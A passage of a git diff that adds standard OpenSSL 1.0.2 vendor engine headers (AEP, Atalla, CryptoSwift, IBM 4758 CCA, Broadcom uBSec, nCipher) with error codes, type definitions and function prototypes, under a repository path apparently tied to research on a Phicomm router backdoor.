+! Ensure transfer vector is at beginning of image
+!
+CLUSTER=FIRST
+COLLECT=FIRST,$$ENGINE
+!
+! make psects nonshareable so image can be installed.
+!
+PSECT_ATTR=$CHAR_STRING_CONSTANTS,NOWRT
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/aep.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/aep.h
new file mode 100644
index 0000000..04ab87e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/aep.h
@@ -0,0 +1,235 @@
+/*
+ * This header declares the necessary definitions for using the
+ * exponentiation acceleration capabilities, and rnd number generation of the
+ * AEP card.
+ */
+
+/*
+ *
+ * Some AEP defines
+ *
+ */
+
+/*
+ * Successful return value
+ */
+#define AEP_R_OK                                0x00000000
+
+/*
+ * Miscelleanous unsuccessful return value
+ */
+#define AEP_R_GENERAL_ERROR                     0x10000001
+
+/*
+ * Insufficient host memory
+ */
+#define AEP_R_HOST_MEMORY                       0x10000002
+
+#define AEP_R_FUNCTION_FAILED                   0x10000006
+
+/*
+ * Invalid arguments in function call
+ */
+#define AEP_R_ARGUMENTS_BAD                     0x10020000
+
+#define AEP_R_NO_TARGET_RESOURCES                               0x10030000
+
+/*
+ * Error occuring on socket operation
+ */
+#define AEP_R_SOCKERROR                                                 0x10000010
+
+/*
+ * Socket has been closed from the other end
+ */
+#define AEP_R_SOCKEOF                                                   0x10000011
+
+/*
+ * Invalid handles
+ */
+#define AEP_R_CONNECTION_HANDLE_INVALID         0x100000B3
+
+#define AEP_R_TRANSACTION_HANDLE_INVALID                0x10040000
+
+/*
+ * Transaction has not yet returned from accelerator
+ */
+#define AEP_R_TRANSACTION_NOT_READY                             0x00010000
+
+/*
+ * There is already a thread waiting on this transaction
+ */
+#define AEP_R_TRANSACTION_CLAIMED                               0x10050000
+
+/*
+ * The transaction timed out
+ */
+#define AEP_R_TIMED_OUT                                                 0x10060000
+
+#define AEP_R_FXN_NOT_IMPLEMENTED                               0x10070000
+
+#define AEP_R_TARGET_ERROR                                              0x10080000
+
+/*
+ * Error in the AEP daemon process
+ */
+#define AEP_R_DAEMON_ERROR                                              0x10090000
+
+/*
+ * Invalid ctx id
+ */
+#define AEP_R_INVALID_CTX_ID                                    0x10009000
+
+#define AEP_R_NO_KEY_MANAGER                                    0x1000a000
+
+/*
+ * Error obtaining a mutex
+ */
+#define AEP_R_MUTEX_BAD                         0x000001A0
+
+/*
+ * Fxn call before AEP_Initialise ot after AEP_Finialise
+ */
+#define AEP_R_AEPAPI_NOT_INITIALIZED                    0x10000190
+
+/*
+ * AEP_Initialise has already been called
+ */
+#define AEP_R_AEPAPI_ALREADY_INITIALIZED                0x10000191
+
+/*
+ * Maximum number of connections to daemon reached
+ */
+#define AEP_R_NO_MORE_CONNECTION_HNDLS                  0x10000200
+
+/*
+ *
+ * Some AEP Type definitions
+ *
+ */
+
+/* an unsigned 8-bit value */
+typedef unsigned char AEP_U8;
+
+/* an unsigned 8-bit character */
+typedef char AEP_CHAR;
+
+/* a BYTE-sized Boolean flag */
+typedef AEP_U8 AEP_BBOOL;
+
+/*
+ * Unsigned value, at least 16 bits long
+ */
+typedef unsigned short AEP_U16;
+
+/* an unsigned value, at least 32 bits long */
+#ifdef SIXTY_FOUR_BIT_LONG
+typedef unsigned int AEP_U32;
+#else
+typedef unsigned long AEP_U32;
+#endif
+
+#ifdef SIXTY_FOUR_BIT_LONG
+typedef unsigned long AEP_U64;
+#else
+typedef struct {
+    unsigned long l1, l2;
+} AEP_U64;
+#endif
+
+/* at least 32 bits; each bit is a Boolean flag */
+typedef AEP_U32 AEP_FLAGS;
+
+typedef AEP_U8 *AEP_U8_PTR;
+typedef AEP_CHAR *AEP_CHAR_PTR;
+typedef AEP_U32 *AEP_U32_PTR;
+typedef AEP_U64 *AEP_U64_PTR;
+typedef void *AEP_VOID_PTR;
+
+/* Pointer to a AEP_VOID_PTR-- i.e., pointer to pointer to void */
+typedef AEP_VOID_PTR *AEP_VOID_PTR_PTR;
+
+/*
+ * Used to identify an AEP connection handle
+ */
+typedef AEP_U32 AEP_CONNECTION_HNDL;
+
+/*
+ * Pointer to an AEP connection handle
+ */
+typedef AEP_CONNECTION_HNDL *AEP_CONNECTION_HNDL_PTR;
+
+/*
+ * Used by an application (in conjunction with the apps process id) to
+ * identify an individual transaction
+ */
+typedef AEP_U32 AEP_TRANSACTION_ID;
+
+/*
+ * Pointer to an applications transaction identifier
+ */
+typedef AEP_TRANSACTION_ID *AEP_TRANSACTION_ID_PTR;
+
+/*
+ * Return value type
+ */
+typedef AEP_U32 AEP_RV;
+
+#define MAX_PROCESS_CONNECTIONS 256
+
+#define RAND_BLK_SIZE 1024
+
+typedef enum {
+    NotConnected = 0,
+    Connected = 1,
+    InUse = 2
+} AEP_CONNECTION_STATE;
+
+typedef struct AEP_CONNECTION_ENTRY {
+    AEP_CONNECTION_STATE conn_state;
+    AEP_CONNECTION_HNDL conn_hndl;
+} AEP_CONNECTION_ENTRY;
+
+typedef AEP_RV t_AEP_OpenConnection(AEP_CONNECTION_HNDL_PTR phConnection);
+typedef AEP_RV t_AEP_CloseConnection(AEP_CONNECTION_HNDL hConnection);
+
+typedef AEP_RV t_AEP_ModExp(AEP_CONNECTION_HNDL hConnection,
+                            AEP_VOID_PTR pA, AEP_VOID_PTR pP,
+                            AEP_VOID_PTR pN,
+                            AEP_VOID_PTR pResult,
+                            AEP_TRANSACTION_ID *pidTransID);
+
+typedef AEP_RV t_AEP_ModExpCrt(AEP_CONNECTION_HNDL hConnection,
+                               AEP_VOID_PTR pA, AEP_VOID_PTR pP,
+                               AEP_VOID_PTR pQ,
+                               AEP_VOID_PTR pDmp1, AEP_VOID_PTR pDmq1,
+                               AEP_VOID_PTR pIqmp,
+                               AEP_VOID_PTR pResult,
+                               AEP_TRANSACTION_ID *pidTransID);
+
+#ifdef AEPRAND
+typedef AEP_RV t_AEP_GenRandom(AEP_CONNECTION_HNDL hConnection,
+                               AEP_U32 Len,
+                               AEP_U32 Type,
+                               AEP_VOID_PTR pResult,
+                               AEP_TRANSACTION_ID *pidTransID);
+#endif
+
+typedef AEP_RV t_AEP_Initialize(AEP_VOID_PTR pInitArgs);
+typedef AEP_RV t_AEP_Finalize(void);
+typedef AEP_RV t_AEP_SetBNCallBacks(AEP_RV (*GetBigNumSizeFunc)
+                                     (AEP_VOID_PTR ArbBigNum,
+                                      AEP_U32 *BigNumSize),
+                                    AEP_RV (*MakeAEPBigNumFunc) (AEP_VOID_PTR
+                                                                 ArbBigNum,
+                                                                 AEP_U32
+                                                                 BigNumSize,
+                                                                 unsigned char
+                                                                 *AEP_BigNum),
+                                    AEP_RV (*ConverAEPBigNumFunc) (void
+                                                                   *ArbBigNum,
+                                                                   AEP_U32
+                                                                   BigNumSize,
+                                                                   unsigned
+                                                                   char
+                                                                   *AEP_BigNum));
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/atalla.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/atalla.h
new file mode 100644
index 0000000..60e7eda
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/atalla.h
@@ -0,0 +1,44 @@
+/*
+ * This header declares the necessary definitions for using the
+ * exponentiation acceleration capabilities of Atalla cards. The only
+ * cryptographic operation is performed by "ASI_RSAPrivateKeyOpFn" and this
+ * takes a structure that defines an "RSA private key". However, it is really
+ * only performing a regular mod_exp using the supplied modulus and exponent
+ * - no CRT form is being used. Hence, it is a generic mod_exp function in
+ * disguise, and we use it as such. Thanks to the people at Atalla for
+ * letting me know these definitions are fine and that they can be reproduced
+ * here. Geoff.
+ */
+
+typedef struct ItemStr {
+    unsigned char *data;
+    int len;
+} Item;
+
+typedef struct RSAPrivateKeyStr {
+    void *reserved;
+    Item version;
+    Item modulus;
+    Item publicExponent;
+    Item privateExponent;
+    Item prime[2];
+    Item exponent[2];
+    Item coefficient;
+} RSAPrivateKey;
+
+/*
+ * Predeclare the function pointer types that we dynamically load from the
+ * DSO. These use the same names and form that Ben's original support code
+ * had (in crypto/bn/bn_exp.c) unless of course I've inadvertently changed
+ * the style somewhere along the way!
+ */
+
+typedef int tfnASI_GetPerformanceStatistics(int reset_flag,
+                                            unsigned int *ret_buf);
+
+typedef int tfnASI_GetHardwareConfig(long card_num, unsigned int *ret_buf);
+
+typedef int tfnASI_RSAPrivateKeyOpFn(RSAPrivateKey * rsaKey,
+                                     unsigned char *output,
+                                     unsigned char *input,
+                                     unsigned int modulus_len);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/cswift.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/cswift.h
new file mode 100644
index 0000000..6dcd5fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/cswift.h
@@ -0,0 +1,235 @@
+/*
+ * Attribution notice: Rainbow have generously allowed me to reproduce the
+ * necessary definitions here from their API. This means the support can
+ * build independently of whether application builders have the API or
+ * hardware. This will allow developers to easily produce software that has
+ * latent hardware support for any users that have accelertors installed,
+ * without the developers themselves needing anything extra. I have only
+ * clipped the parts from the CryptoSwift header files that are (or seem)
+ * relevant to the CryptoSwift support code. This is simply to keep the file
+ * sizes reasonable. [Geoff]
+ */
+
+/*
+ * NB: These type widths do *not* seem right in general, in particular
+ * they're not terribly friendly to 64-bit architectures (unsigned long) will
+ * be 64-bit on IA-64 for a start. I'm leaving these alone as they agree with
+ * Rainbow's API and this will only be called into question on platforms with
+ * Rainbow support anyway! ;-)
+ */
+
+#ifdef __cplusplus
+extern "C" {
+#endif                          /* __cplusplus */
+
+    typedef long SW_STATUS;     /* status */
+    typedef unsigned char SW_BYTE; /* 8 bit byte */
+    typedef unsigned short SW_U16; /* 16 bit number */
+#if defined(_IRIX)
+# include <sgidefs.h>
+    typedef __uint32_t SW_U32;
+#else
+    typedef unsigned long SW_U32; /* 32 bit integer */
+#endif
+
+#if defined(OPENSSL_SYS_WIN32)
+    typedef struct _SW_U64 {
+        SW_U32 low32;
+        SW_U32 high32;
+    } SW_U64;                   /* 64 bit integer */
+#elif defined(OPENSSL_SYS_MACINTOSH_CLASSIC)
+    typedef longlong SW_U64
+#else                           /* Unix variants */
+    typedef struct _SW_U64 {
+        SW_U32 low32;
+        SW_U32 high32;
+    } SW_U64;                   /* 64 bit integer */
+#endif
+
+/* status codes */
+#define SW_OK                 (0L)
+#define SW_ERR_BASE           (-10000L)
+#define SW_ERR_NO_CARD        (SW_ERR_BASE-1) /* The Card is not present */
+#define SW_ERR_CARD_NOT_READY (SW_ERR_BASE-2) /* The card has not powered */
+    /*    up yet                 */
+#define SW_ERR_TIME_OUT       (SW_ERR_BASE-3) /* Execution of a command */
+    /*    time out               */
+#define SW_ERR_NO_EXECUTE     (SW_ERR_BASE-4) /* The Card failed to */
+    /*    execute the command    */
+#define SW_ERR_INPUT_NULL_PTR (SW_ERR_BASE-5) /* a required pointer is */
+    /*    NULL                   */
+#define SW_ERR_INPUT_SIZE     (SW_ERR_BASE-6) /* size is invalid, too */
+    /*    small, too large.      */
+#define SW_ERR_INVALID_HANDLE (SW_ERR_BASE-7) /* Invalid SW_ACC_CONTEXT */
+    /*    handle                 */
+#define SW_ERR_PENDING        (SW_ERR_BASE-8) /* A request is already out- */
+    /*    standing at this       */
+    /*    context handle         */
+#define SW_ERR_AVAILABLE      (SW_ERR_BASE-9) /* A result is available.  */
+#define SW_ERR_NO_PENDING     (SW_ERR_BASE-10) /* No request is pending.  */
+#define SW_ERR_NO_MEMORY      (SW_ERR_BASE-11) /* Not enough memory */
+#define SW_ERR_BAD_ALGORITHM  (SW_ERR_BASE-12) /* Invalid algorithm type */
+    /*    in SW_PARAM structure  */
+#define SW_ERR_MISSING_KEY    (SW_ERR_BASE-13) /* No key is associated with */
+    /*    context.               */
+    /*    swAttachKeyParam() is  */
+    /*    not called.            */
+#define SW_ERR_KEY_CMD_MISMATCH \
+                              (SW_ERR_BASE-14) /* Cannot perform requested */
+    /*    SW_COMMAND_CODE since  */
+    /*    key attached via       */
+    /*    swAttachKeyParam()     */
+    /*    cannot be used for this */
+    /*    SW_COMMAND_CODE.       */
+#define SW_ERR_NOT_IMPLEMENTED \
+                              (SW_ERR_BASE-15) /* Not implemented */
+#define SW_ERR_BAD_COMMAND    (SW_ERR_BASE-16) /* Bad command code */
+#define SW_ERR_BAD_ITEM_SIZE  (SW_ERR_BASE-17) /* too small or too large in */
+    /*    the "initems" or       */
+    /*    "outitems".            */
+#define SW_ERR_BAD_ACCNUM     (SW_ERR_BASE-18) /* Bad accelerator number */
+#define SW_ERR_SELFTEST_FAIL  (SW_ERR_BASE-19) /* At least one of the self */
+    /*    test fail, look at the */
+    /*    selfTestBitmap in      */
+    /*    SW_ACCELERATOR_INFO for */
+    /*    details.               */
+#define SW_ERR_MISALIGN       (SW_ERR_BASE-20) /* Certain alogrithms require */
+    /*    key materials aligned  */
+    /*    in certain order, e.g. */
+    /*    128 bit for CRT        */
+#define SW_ERR_OUTPUT_NULL_PTR \
+                              (SW_ERR_BASE-21) /* a required pointer is */
+    /*    NULL                   */
+#define SW_ERR_OUTPUT_SIZE \
+                              (SW_ERR_BASE-22) /* size is invalid, too */
+    /*    small, too large.      */
+#define SW_ERR_FIRMWARE_CHECKSUM \
+                              (SW_ERR_BASE-23) /* firmware checksum mismatch */
+    /*    download failed.       */
+#define SW_ERR_UNKNOWN_FIRMWARE \
+                              (SW_ERR_BASE-24) /* unknown firmware error */
+#define SW_ERR_INTERRUPT      (SW_ERR_BASE-25) /* request is abort when */
+    /*    it's waiting to be     */
+    /*    completed.             */
+#define SW_ERR_NVWRITE_FAIL   (SW_ERR_BASE-26) /* error in writing to Non- */
+    /*    volatile memory        */
+#define SW_ERR_NVWRITE_RANGE  (SW_ERR_BASE-27) /* out of range error in */
+    /*    writing to NV memory   */
+#define SW_ERR_RNG_ERROR      (SW_ERR_BASE-28) /* Random Number Generation */
+    /*    failure                */
+#define SW_ERR_DSS_FAILURE    (SW_ERR_BASE-29) /* DSS Sign or Verify failure */
+#define SW_ERR_MODEXP_FAILURE (SW_ERR_BASE-30) /* Failure in various math */
+    /*    calculations           */
+#define SW_ERR_ONBOARD_MEMORY (SW_ERR_BASE-31) /* Error in accessing on - */
+    /*    board memory           */
+#define SW_ERR_FIRMWARE_VERSION \
+                              (SW_ERR_BASE-32) /* Wrong version in firmware */
+    /*    update                 */
+#define SW_ERR_ZERO_WORKING_ACCELERATOR \
+                              (SW_ERR_BASE-44) /* All accelerators are bad */
+
+    /* algorithm type */
+#define SW_ALG_CRT          1
+#define SW_ALG_EXP          2
+#define SW_ALG_DSA          3
+#define SW_ALG_NVDATA       4
+
+    /* command code */
+#define SW_CMD_MODEXP_CRT   1   /* perform Modular Exponentiation using */
+    /*  Chinese Remainder Theorem (CRT)      */
+#define SW_CMD_MODEXP       2   /* perform Modular Exponentiation */
+#define SW_CMD_DSS_SIGN     3   /* perform DSS sign */
+#define SW_CMD_DSS_VERIFY   4   /* perform DSS verify */
+#define SW_CMD_RAND         5   /* perform random number generation */
+#define SW_CMD_NVREAD       6   /* perform read to nonvolatile RAM */
+#define SW_CMD_NVWRITE      7   /* perform write to nonvolatile RAM */
+
+    typedef SW_U32 SW_ALGTYPE;  /* alogrithm type */
+    typedef SW_U32 SW_STATE;    /* state */
+    typedef SW_U32 SW_COMMAND_CODE; /* command code */
+    typedef SW_U32 SW_COMMAND_BITMAP[4]; /* bitmap */
+
+    typedef struct _SW_LARGENUMBER {
+        SW_U32 nbytes;          /* number of bytes in the buffer "value" */
+        SW_BYTE *value;         /* the large integer as a string of */
+        /*   bytes in network (big endian) order  */
+    } SW_LARGENUMBER;
+
+#if defined(OPENSSL_SYS_WIN32)
+# include <windows.h>
+    typedef HANDLE SW_OSHANDLE; /* handle to kernel object */
+# define SW_OS_INVALID_HANDLE  INVALID_HANDLE_VALUE
+# define SW_CALLCONV _stdcall
+#elif defined(OPENSSL_SYS_MACINTOSH_CLASSIC)
+    /* async callback mechanisms */
+    /* swiftCallbackLevel */
+# define SW_MAC_CALLBACK_LEVEL_NO         0
+# define SW_MAC_CALLBACK_LEVEL_HARDWARE   1/* from the hardware ISR */
+# define SW_MAC_CALLBACK_LEVEL_SECONDARY  2/* as secondary ISR */
+    typedef int SW_MAC_CALLBACK_LEVEL;
+    typedef int SW_OSHANDLE;
+# define SW_OS_INVALID_HANDLE  (-1)
+# define SW_CALLCONV
+#else                           /* Unix variants */
+    typedef int SW_OSHANDLE;    /* handle to driver */
+# define SW_OS_INVALID_HANDLE  (-1)
+# define SW_CALLCONV
+#endif
+
+    typedef struct _SW_CRT {
+        SW_LARGENUMBER p;       /* prime number p */
+        SW_LARGENUMBER q;       /* prime number q */
+        SW_LARGENUMBER dmp1;    /* exponent1 */
+        SW_LARGENUMBER dmq1;    /* exponent2 */
+        SW_LARGENUMBER iqmp;    /* CRT coefficient */
+    } SW_CRT;
+
+    typedef struct _SW_EXP {
+        SW_LARGENUMBER modulus; /* modulus */
+        SW_LARGENUMBER exponent; /* exponent */
+    } SW_EXP;
+
+    typedef struct _SW_DSA {
+        SW_LARGENUMBER p;       /* */
+        SW_LARGENUMBER q;       /* */
+        SW_LARGENUMBER g;       /* */
+        SW_LARGENUMBER key;     /* private/public key */
+    } SW_DSA;
+
+    typedef struct _SW_NVDATA {
+        SW_U32 accnum;          /* accelerator board number */
+        SW_U32 offset;          /* offset in byte */
+    } SW_NVDATA;
+
+    typedef struct _SW_PARAM {
+        SW_ALGTYPE type;        /* type of the alogrithm */
+        union {
+            SW_CRT crt;
+            SW_EXP exp;
+            SW_DSA dsa;
+            SW_NVDATA nvdata;
+        } up;
+    } SW_PARAM;
+
+    typedef SW_U32 SW_CONTEXT_HANDLE; /* opaque context handle */
+
+    /*
+     * Now the OpenSSL bits, these function types are the for the function
+     * pointers that will bound into the Rainbow shared libraries.
+     */
+    typedef SW_STATUS SW_CALLCONV t_swAcquireAccContext(SW_CONTEXT_HANDLE
+                                                        *hac);
+    typedef SW_STATUS SW_CALLCONV t_swAttachKeyParam(SW_CONTEXT_HANDLE hac,
+                                                     SW_PARAM *key_params);
+    typedef SW_STATUS SW_CALLCONV t_swSimpleRequest(SW_CONTEXT_HANDLE hac,
+                                                    SW_COMMAND_CODE cmd,
+                                                    SW_LARGENUMBER pin[],
+                                                    SW_U32 pin_count,
+                                                    SW_LARGENUMBER pout[],
+                                                    SW_U32 pout_count);
+    typedef SW_STATUS SW_CALLCONV t_swReleaseAccContext(SW_CONTEXT_HANDLE
+                                                        hac);
+
+#ifdef __cplusplus
+}
+#endif                          /* __cplusplus */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hw_4758_cca.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hw_4758_cca.h
new file mode 100644
index 0000000..235543a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hw_4758_cca.h
@@ -0,0 +1,150 @@
+/**********************************************************************/
+/*                                                                    */
+/*  Prototypes of the CCA verbs used by the 4758 CCA openssl driver   */
+/*                                                                    */
+/*  Maurice Gittens <maurice@gittens.nl>                              */
+/*                                                                    */
+/**********************************************************************/
+
+#ifndef __HW_4758_CCA__
+# define __HW_4758_CCA__
+
+/*
+ *  Only WIN32 support for now
+ */
+# if defined(WIN32)
+
+#  define CCA_LIB_NAME "CSUNSAPI"
+
+#  define CSNDPKX   "CSNDPKX_32"
+#  define CSNDKRR   "CSNDKRR_32"
+#  define CSNDPKE   "CSNDPKE_32"
+#  define CSNDPKD   "CSNDPKD_32"
+#  define CSNDDSV   "CSNDDSV_32"
+#  define CSNDDSG   "CSNDDSG_32"
+#  define CSNBRNG   "CSNBRNG_32"
+
+#  define SECURITYAPI __stdcall
+# else
+    /*
+     * Fixme!! Find out the values of these constants for other platforms.
+     */
+#  define CCA_LIB_NAME "CSUNSAPI"
+
+#  define CSNDPKX   "CSNDPKX"
+#  define CSNDKRR   "CSNDKRR"
+#  define CSNDPKE   "CSNDPKE"
+#  define CSNDPKD   "CSNDPKD"
+#  define CSNDDSV   "CSNDDSV"
+#  define CSNDDSG   "CSNDDSG"
+#  define CSNBRNG   "CSNBRNG"
+
+#  define SECURITYAPI
+# endif
+
+/*
+ * security API prototypes
+ */
+
+/* PKA Key Record Read */
+typedef void (SECURITYAPI * F_KEYRECORDREAD)
+ (long *return_code,
+  long *reason_code,
+  long *exit_data_length,
+  unsigned char *exit_data,
+  long *rule_array_count,
+  unsigned char *rule_array,
+  unsigned char *key_label, long *key_token_length, unsigned char *key_token);
+
+/* Random Number Generate */
+typedef void (SECURITYAPI * F_RANDOMNUMBERGENERATE)
+ (long *return_code,
+  long *reason_code,
+  long *exit_data_length,
+  unsigned char *exit_data,
+  unsigned char *form, unsigned char *random_number);
+
+/* Digital Signature Generate */
+typedef void (SECURITYAPI * F_DIGITALSIGNATUREGENERATE)
+ (long *return_code,
+  long *reason_code,
+  long *exit_data_length,
+  unsigned char *exit_data,
+  long *rule_array_count,
+  unsigned char *rule_array,
+  long *PKA_private_key_id_length,
+  unsigned char *PKA_private_key_id,
+  long *hash_length,
+  unsigned char *hash,
+  long *signature_field_length,
+  long *signature_bit_length, unsigned char *signature_field);
+
+/* Digital Signature Verify */
+typedef void (SECURITYAPI * F_DIGITALSIGNATUREVERIFY) (long *return_code,
+                                                       long *reason_code,
+                                                       long *exit_data_length,
+                                                       unsigned char
+                                                       *exit_data,
+                                                       long *rule_array_count,
+                                                       unsigned char
+                                                       *rule_array,
+                                                       long
+                                                       *PKA_public_key_id_length,
+                                                       unsigned char
+                                                       *PKA_public_key_id,
+                                                       long *hash_length,
+                                                       unsigned char *hash,
+                                                       long
+                                                       *signature_field_length,
+                                                       unsigned char
+                                                       *signature_field);
+
+/* PKA Public Key Extract */
+typedef void (SECURITYAPI * F_PUBLICKEYEXTRACT) (long *return_code,
+                                                 long *reason_code,
+                                                 long *exit_data_length,
+                                                 unsigned char *exit_data,
+                                                 long *rule_array_count,
+                                                 unsigned char *rule_array,
+                                                 long
+                                                 *source_key_identifier_length,
+                                                 unsigned char
+                                                 *source_key_identifier,
+                                                 long
+                                                 *target_key_token_length,
+                                                 unsigned char
+                                                 *target_key_token);
+
+/* PKA Encrypt */
+typedef void (SECURITYAPI * F_PKAENCRYPT)
+ (long *return_code,
+  long *reason_code,
+  long *exit_data_length,
+  unsigned char *exit_data,
+  long *rule_array_count,
+  unsigned char *rule_array,
+  long *key_value_length,
+  unsigned char *key_value,
+  long *data_struct_length,
+  unsigned char *data_struct,
+  long *RSA_public_key_length,
+  unsigned char *RSA_public_key,
+  long *RSA_encipher_length, unsigned char *RSA_encipher);
+
+/* PKA Decrypt */
+typedef void (SECURITYAPI * F_PKADECRYPT)
+ (long *return_code,
+  long *reason_code,
+  long *exit_data_length,
+  unsigned char *exit_data,
+  long *rule_array_count,
+  unsigned char *rule_array,
+  long *enciphered_key_length,
+  unsigned char *enciphered_key,
+  long *data_struct_length,
+  unsigned char *data_struct,
+  long *RSA_private_key_length,
+  unsigned char *RSA_private_key,
+  long *key_value_length, unsigned char *key_value);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hw_ubsec.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hw_ubsec.h
new file mode 100644
index 0000000..a4e67fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hw_ubsec.h
@@ -0,0 +1,124 @@
+/******************************************************************************
+ *
+ *  Copyright 2000
+ *  Broadcom Corporation
+ *  16215 Alton Parkway
+ *  PO Box 57013
+ *  Irvine CA 92619-7013
+ *
+ *****************************************************************************/
+/*
+ * Broadcom Corporation uBSec SDK
+ */
+/*
+ * Character device header file.
+ */
+/*
+ * Revision History:
+ *
+ * October 2000 JTT Created.
+ */
+
+#define MAX_PUBLIC_KEY_BITS (1024)
+#define MAX_PUBLIC_KEY_BYTES (1024/8)
+#define SHA_BIT_SIZE  (160)
+#define MAX_CRYPTO_KEY_LENGTH 24
+#define MAX_MAC_KEY_LENGTH 64
+#define UBSEC_CRYPTO_DEVICE_NAME ((unsigned char *)"/dev/ubscrypt")
+#define UBSEC_KEY_DEVICE_NAME ((unsigned char *)"/dev/ubskey")
+
+/* Math command types. */
+#define UBSEC_MATH_MODADD 0x0001
+#define UBSEC_MATH_MODSUB 0x0002
+#define UBSEC_MATH_MODMUL 0x0004
+#define UBSEC_MATH_MODEXP 0x0008
+#define UBSEC_MATH_MODREM 0x0010
+#define UBSEC_MATH_MODINV 0x0020
+
+typedef long ubsec_MathCommand_t;
+typedef long ubsec_RNGCommand_t;
+
+typedef struct ubsec_crypto_context_s {
+    unsigned int flags;
+    unsigned char crypto[MAX_CRYPTO_KEY_LENGTH];
+    unsigned char auth[MAX_MAC_KEY_LENGTH];
+} ubsec_crypto_context_t, *ubsec_crypto_context_p;
+
+/*
+ * Predeclare the function pointer types that we dynamically load from the DSO.
+ */
+
+typedef int t_UBSEC_ubsec_bytes_to_bits(unsigned char *n, int bytes);
+
+typedef int t_UBSEC_ubsec_bits_to_bytes(int bits);
+
+typedef int t_UBSEC_ubsec_open(unsigned char *device);
+
+typedef int t_UBSEC_ubsec_close(int fd);
+
+typedef int t_UBSEC_diffie_hellman_generate_ioctl(int fd,
+                                                  unsigned char *x,
+                                                  int *x_len,
+                                                  unsigned char *y,
+                                                  int *y_len,
+                                                  unsigned char *g, int g_len,
+                                                  unsigned char *m, int m_len,
+                                                  unsigned char *userX,
+                                                  int userX_len,
+                                                  int random_bits);
+
+typedef int t_UBSEC_diffie_hellman_agree_ioctl(int fd,
+                                               unsigned char *x, int x_len,
+                                               unsigned char *y, int y_len,
+                                               unsigned char *m, int m_len,
+                                               unsigned char *k, int *k_len);
+
+typedef int t_UBSEC_rsa_mod_exp_ioctl(int fd,
+                                      unsigned char *x, int x_len,
+                                      unsigned char *m, int m_len,
+                                      unsigned char *e, int e_len,
+                                      unsigned char *y, int *y_len);
+
+typedef int t_UBSEC_rsa_mod_exp_crt_ioctl(int fd,
+                                          unsigned char *x, int x_len,
+                                          unsigned char *qinv, int qinv_len,
+                                          unsigned char *edq, int edq_len,
+                                          unsigned char *q, int q_len,
+                                          unsigned char *edp, int edp_len,
+                                          unsigned char *p, int p_len,
+                                          unsigned char *y, int *y_len);
+
+typedef int t_UBSEC_dsa_sign_ioctl(int fd,
+                                   int hash, unsigned char *data,
+                                   int data_len, unsigned char *rndom,
+                                   int random_len, unsigned char *p,
+                                   int p_len, unsigned char *q, int q_len,
+                                   unsigned char *g, int g_len,
+                                   unsigned char *key, int key_len,
+                                   unsigned char *r, int *r_len,
+                                   unsigned char *s, int *s_len);
+
+typedef int t_UBSEC_dsa_verify_ioctl(int fd,
+                                     int hash, unsigned char *data,
+                                     int data_len, unsigned char *p,
+                                     int p_len, unsigned char *q, int q_len,
+                                     unsigned char *g, int g_len,
+                                     unsigned char *key, int key_len,
+                                     unsigned char *r, int r_len,
+                                     unsigned char *s, int s_len,
+                                     unsigned char *v, int *v_len);
+
+typedef int t_UBSEC_math_accelerate_ioctl(int fd, ubsec_MathCommand_t command,
+                                          unsigned char *ModN, int *ModN_len,
+                                          unsigned char *ExpE, int *ExpE_len,
+                                          unsigned char *ParamA,
+                                          int *ParamA_len,
+                                          unsigned char *ParamB,
+                                          int *ParamB_len,
+                                          unsigned char *Result,
+                                          int *Result_len);
+
+typedef int t_UBSEC_rng_ioctl(int fd, ubsec_RNGCommand_t command,
+                              unsigned char *Result, int *Result_len);
+
+typedef int t_UBSEC_max_key_len_ioctl(int fd, int *max_key_len);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hwcryptohook.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hwcryptohook.h
new file mode 100644
index 0000000..fa06396
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/hwcryptohook.h
@@ -0,0 +1,502 @@
+/*-
+ * ModExp / RSA (with/without KM) plugin API
+ *
+ * The application will load a dynamic library which
+ * exports entrypoint(s) defined in this file.
+ *
+ * This set of entrypoints provides only a multithreaded,
+ * synchronous-within-each-thread, facility.
+ *
+ *
+ * This file is Copyright 1998-2000 nCipher Corporation Limited.
+ *
+ * Redistribution and use in source and binary forms, with opr without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the copyright notice,
+ *    this list of conditions, and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above
+ *    copyright notice, this list of conditions, and the following
+ *    disclaimer, in the documentation and/or other materials provided
+ *    with the distribution
+ *
+ * IN NO EVENT SHALL NCIPHER CORPORATION LIMITED (`NCIPHER') AND/OR
+ * ANY OTHER AUTHORS OR DISTRIBUTORS OF THIS FILE BE LIABLE for any
+ * damages arising directly or indirectly from this file, its use or
+ * this licence.  Without prejudice to the generality of the
+ * foregoing: all liability shall be excluded for direct, indirect,
+ * special, incidental, consequential or other damages or any loss of
+ * profits, business, revenue goodwill or anticipated savings;
+ * liability shall be excluded even if nCipher or anyone else has been
